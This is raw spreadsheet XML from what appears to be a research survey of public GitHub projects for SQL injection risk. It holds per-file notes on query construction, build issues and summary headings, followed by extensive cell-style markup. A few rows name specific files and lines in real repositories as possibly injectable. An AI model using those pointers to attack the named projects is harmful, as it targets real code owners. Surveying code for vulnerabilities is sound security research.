    <t>Most SQL statements are hardcoded. Some concatenate variables that come from sanitized functions such as ToInt32. The query beginning on line 413 appears to concatenate input from a TextBox. Injection may be possible.</t>
  </si>
  <si>
    <t>Build errors, could not get the project running. Project is 100% C#</t>
  </si>
  <si>
    <t>https://github.com/shrikant-takale/ComputerCare/raw/ec37c36eb6c7d6dc7e37e0ce0248e5797d251479/ComputerCare/Operations/FrmGroupSMS.cs</t>
  </si>
  <si>
    <t>Select</t>
  </si>
  <si>
    <t>The first query is hardcoded and selects the name attribute from the tblsession table. The first result from this query is concatenated into the second query. Depending on how the name attribute is sanitized, second order injection may be possible.</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
      </rPr>
      <t>Time Limit exceeded</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
      </rPr>
      <t>. Needed to install SAP CrystalReports. Project is 100% C#</t>
    </r>
  </si>
  <si>
    <t>https://github.com/CameronOlson/Blogger/raw/7d6a010f21a2d90c8bc72c1cbf513c81fa508dcb/Repositories/BlogsRepository.cs</t>
  </si>
  <si>
    <t>Select, join, insert, update, delete</t>
  </si>
  <si>
    <t>Hardcoded and uses prepared statements</t>
  </si>
  <si>
    <t>Requires Docker</t>
  </si>
  <si>
    <t>https://github.com/manjarb/docker-dive-into-docker-course/raw/6c6c0ff7e63bf07df584273f9b670c4b83f86ede/doc/diveintodocker/src/07-docker-compose-in-the-real-world/06-managing-microservices-with-docker-compose/worker/src/Worker/Program.cs</t>
  </si>
  <si>
    <t>Create table, insert, update</t>
  </si>
  <si>
    <t>Some statements are hardcoded, those that aren't have all user input going into prepared statements</t>
  </si>
  <si>
    <t>Did not install Docker in the VM due to nested virtualization not being supported</t>
  </si>
  <si>
    <t>https://github.com/smart1125/LandBankPushManagement/raw/c3a35bc44923e6739b22a577ae930b05cdbe5830/PushManagement/PushWhitelist.aspx.cs</t>
  </si>
  <si>
    <t>https://github.com/sessionliang/os/raw/cf8fa4ea87c5bd23f5eb25ed3600ce63168af29e/ss/PMS/SiteServer.Project/Provider/Data/SqlServer/Local/PMS/ApplyDAO.cs</t>
  </si>
  <si>
    <t>Variables are interpolated into SQL statements. Some of these variables are constants, others come from other functions. The code may be vulnerable.</t>
  </si>
  <si>
    <t>https://github.com/mfagadi/openvss/raw/3b5a44a6ebe5450835016a141c5a7dcf027f53c4/VsSrc/VsUtils/MySQL/mysql-connector-net-5.2.3-src/MySql.Data/Tests/Source/Syntax.cs</t>
  </si>
  <si>
    <t>The "database0" variable is concatenated in place of a table name, but this variable appears to be statically defined in BaseTest.cs</t>
  </si>
  <si>
    <t>https://github.com/KenAdeniji/WordEngineering/raw/9ce2e29fdaf49154f9416ead251b90d845ef2c6f/IIS/WordEngineering/Bing/Map/BingMapCenterPointLatitudeLongitude.aspx.cs</t>
  </si>
  <si>
    <t>All user input goes is sanitized or goes into prepared statements</t>
  </si>
  <si>
    <t>The webpage fails to load due to errors; user can't input anything</t>
  </si>
  <si>
    <t>https://github.com/Essort/openvss/raw/e0af68f101be26a7c9a677d34ab2273d5eaf1b6a/VsSrc/VsUtils/MySQL/mysql-connector-net-5.2.3-src/MySql.Data/Tests/Source/DataAdapterTests.cs</t>
  </si>
  <si>
    <t>Create, drop, select from, and insert into table</t>
  </si>
  <si>
    <t>ALL SQL statements are hardcoded. User input is never inserted into them. The SQL statement on line 239 concatenates a loop counter variable</t>
  </si>
  <si>
    <t>https://github.com/Devaniti/Semester5Labs/raw/32c4f13093cef298c27ea535afac75dad7461b2e/DB2/LR2/DBLab2/OSLab2/MainWindow.xaml.cs</t>
  </si>
  <si>
    <t>Insert, select, joins</t>
  </si>
  <si>
    <t>SQL statements are mostly hardcoded; some parts of them are interpolated. The interpolated parts come from static readonly string arrays, randomly generated numbers, and TimeSpan evaluation. User input is only used to determine the number of records to add to the Client table.</t>
  </si>
  <si>
    <t>https://github.com/Isidorito/testNET/raw/9c26e9f9b4097c569b79825a84327ec568f0af09/snippets/csharp/VS_Snippets_ADO.NET/DataWorks%20SqlBulkCopy.ConnectionString/CS/source.cs</t>
  </si>
  <si>
    <t>Code Snippet</t>
  </si>
  <si>
    <t>"This repo contains all the sample code that is part of any topic under the .NET documentation. "</t>
  </si>
  <si>
    <t>https://github.com/securitylong100/LONG_FW/raw/f686809a9bdc625cc5e9dec4a1021ef265d82015/NidecMES/GlobalMasterMaintenance/Dao/GroupMachine/UpdateGroupMachineDao.cs</t>
  </si>
  <si>
    <t>Update</t>
  </si>
  <si>
    <t>All user input goes into prepared statements</t>
  </si>
  <si>
    <t>Project is 100% C# files, no ASP.Net or HTML or CSS or JS</t>
  </si>
  <si>
    <t>Totals</t>
  </si>
  <si>
    <t>This table only includes projects that are known to be/potentially vulnerable to SQL-IDIA</t>
  </si>
  <si>
    <t>Language</t>
  </si>
  <si>
    <t>(Multiple Items)</t>
  </si>
  <si>
    <t>C# Total</t>
  </si>
  <si>
    <t>Java</t>
  </si>
  <si>
    <t>Client-server</t>
  </si>
  <si>
    <t>Java Total</t>
  </si>
  <si>
    <t>PHP</t>
  </si>
  <si>
    <t>PHP Total</t>
  </si>
  <si>
    <t>All Languages</t>
  </si>
  <si>
    <t>Dead code:</t>
  </si>
  <si>
    <t>Unprotected library:</t>
  </si>
  <si>
    <t>Interface Type Stats</t>
  </si>
  <si>
    <t>Exploitability Stats</t>
  </si>
  <si>
    <t>Standalone App</t>
  </si>
  <si>
    <t>Author Skill Level Stats</t>
  </si>
  <si>
    <t>Total projects examined</t>
  </si>
  <si>
    <t>Vulnerability percentage</t>
  </si>
  <si>
    <t>Web app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</si>
</sst>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
  </numFmts>
  <fonts count="38">
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <family val="2"/>
    </font>
    <font>
      <u/>
      <sz val="11"/>
      <color theme="10"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FFFF0000"/>
      <name val="Calibri"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF006100"/>
      <name val="Calibri"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF006100"/>
      <name val="Calibri"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF9C0006"/>
      <name val="Calibri"/>
      <scheme val="minor"/>
    </font>
    <font>
      <u/>
      <sz val="11"/>
      <color rgb="FF0563C1"/>
      <name val="Calibri"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FF00B050"/>
      <name val="Calibri"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="8"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="Calibri"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FFFF0000"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF9C5700"/>
      <name val="Calibri"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FFFFFFFF"/>
      <name val="Calibri"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="14"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FFFF0000"/>
      <name val="Calibri"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="18"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="20"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF833C0C"/>
      <name val="Calibri"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF70AD47"/>
      <name val="Calibri"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="16"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF0070C0"/>
      <name val="Calibri"/>
    </font>
    <font>
      <u/>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FF92D050"/>
      <name val="Calibri"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="12"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
  </fonts>
  <fills count="15">
    <fill>
      <patternFill patternType="none"/>
    </fill>
    <fill>
      <patternFill patternType="gray125"/>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFC6EFCE"/>
        <bgColor rgb="FF000000"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFC6EFCE"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFC7CE"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFEDEDED"/>
        <bgColor rgb="FFEDEDED"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFEB9C"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFA5A5A5"/>
        <bgColor rgb="FFA5A5A5"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFF7F7F8"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="4" tint="0.59999389629810485"/>
        <bgColor indexed="65"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="5" tint="0.39997558519241921"/>
        <bgColor indexed="65"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="4" tint="0.79998168889431442"/>
        <bgColor indexed="65"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="2"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="2" tint="-9.9978637043366805E-2"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="0" tint="-4.9989318521683403E-2"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
  </fills>
  <borders count="6">
    <border>
      <left/>
      <right/>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color rgb="FFC9C9C9"/>
      </left>
      <right/>
      <top style="thin">
        <color rgb="FFC9C9C9"/>
      </top>
      <bottom style="thin">
        <color rgb="FFC9C9C9"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right/>
      <top style="thin">
        <color rgb="FFC9C9C9"/>
      </top>
      <bottom style="thin">
        <color rgb="FFC9C9C9"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="thin">
        <color rgb="FFC9C9C9"/>
      </right>
      <top style="thin">
        <color rgb="FFC9C9C9"/>
      </top>
      <bottom style="thin">
        <color rgb="FFC9C9C9"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color rgb="FFE7E7E8"/>
      </left>
      <right style="thin">
        <color rgb="FFE7E7E8"/>
      </right>
      <top style="thin">
        <color rgb="FFE7E7E8"/>
      </top>
      <bottom style="thin">
        <color rgb="FFE7E7E8"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color rgb="FF000000"/>
      </left>
      <right style="thin">
        <color rgb="FF000000"/>
      </right>
      <top style="thin">
        <color rgb="FF000000"/>
      </top>
      <bottom style="thin">
        <color rgb="FF000000"/>
      </bottom>
      <diagonal/>
    </border>
  </borders>
  <cellStyleXfs count="8">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="12" fillId="3" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="14" fillId="4" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="20" fillId="6"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2" fillId="11" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
  </cellStyleXfs>
  <cellXfs count="135">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="16" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1"/>
    <xf numFmtId="0" fontId="8" fillId="2" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="right"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1"/>
    <xf numFmtId="10" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1"/>
    <xf numFmtId="0" fontId="12" fillId="3" borderId="0" xfId="2"/>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="9" fontId="4" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right"/>
    </xf>
    <xf numFmtId="9" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
      <alignment horizontal="right"/>
    </xf>
    <xf numFmtId="164" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
      <alignment horizontal="right"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="4" borderId="0" xfId="3"/>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="1"/>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="4" fillId="5" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="15" fillId="5" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="4" fillId="5" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="4" fillId="5" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="4" fillId="5" borderId="3" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="3" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="4" fillId="5" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="16" fillId="5" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="9" fontId="4" fillId="5" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="3" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="9" fontId="4" fillId="5" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="9" fontId="4" fillId="0" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="18" fillId="5" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="19" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="9" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="21" fillId="7" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="21" fillId="7" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="21" fillId="7" borderId="3" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="20" fillId="6" borderId="0" xfId="4"/>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="9" fillId="5" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" quotePrefix="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" pivotButton="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1"/>
    <xf numFmtId="0" fontId="22" fillId="8" borderId="4" xfId="0" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="22" fontId="4" fillId="5" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="5" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="21" fillId="7" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="5" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="5" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="5" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="5" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="5" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="5" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="5" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="5" borderId="2" xfId="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="2" xfId="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="2" xfId="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="9" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1"/>
    <xf numFmtId="1" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
      <alignment horizontal="right"/>
    </xf>
    <xf numFmtId="1" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="9" borderId="0" xfId="5"/>
    <xf numFmtId="1" fontId="3" fillId="9" borderId="0" xfId="5" applyNumberFormat="1"/>
    <xf numFmtId="1" fontId="3" fillId="9" borderId="0" xfId="5" applyNumberFormat="1" applyAlignment="1">
      <alignment horizontal="right"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="9" borderId="0" xfId="5" applyAlignment="1">
      <alignment horizontal="right"/>
    </xf>
    <xf numFmtId="0" fontId="23" fillId="10" borderId="0" xfId="6" applyFont="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="23" fillId="10" borderId="0" xfId="6" applyFont="1"/>
    <xf numFmtId="1" fontId="23" fillId="10" borderId="0" xfId="6" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="right"/>
    </xf>
    <xf numFmtId="0" fontId="23" fillId="10" borderId="0" xfId="6" applyFont="1" applyAlignment="1">
      <alignment horizontal="right"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="25" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="9" borderId="0" xfId="5" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="11" borderId="0" xfId="7"/>
    <xf numFmtId="0" fontId="28" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="31" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="32" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="1" fontId="23" fillId="10" borderId="0" xfId="6" applyNumberFormat="1" applyFont="1"/>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="1" applyAlignment="1">
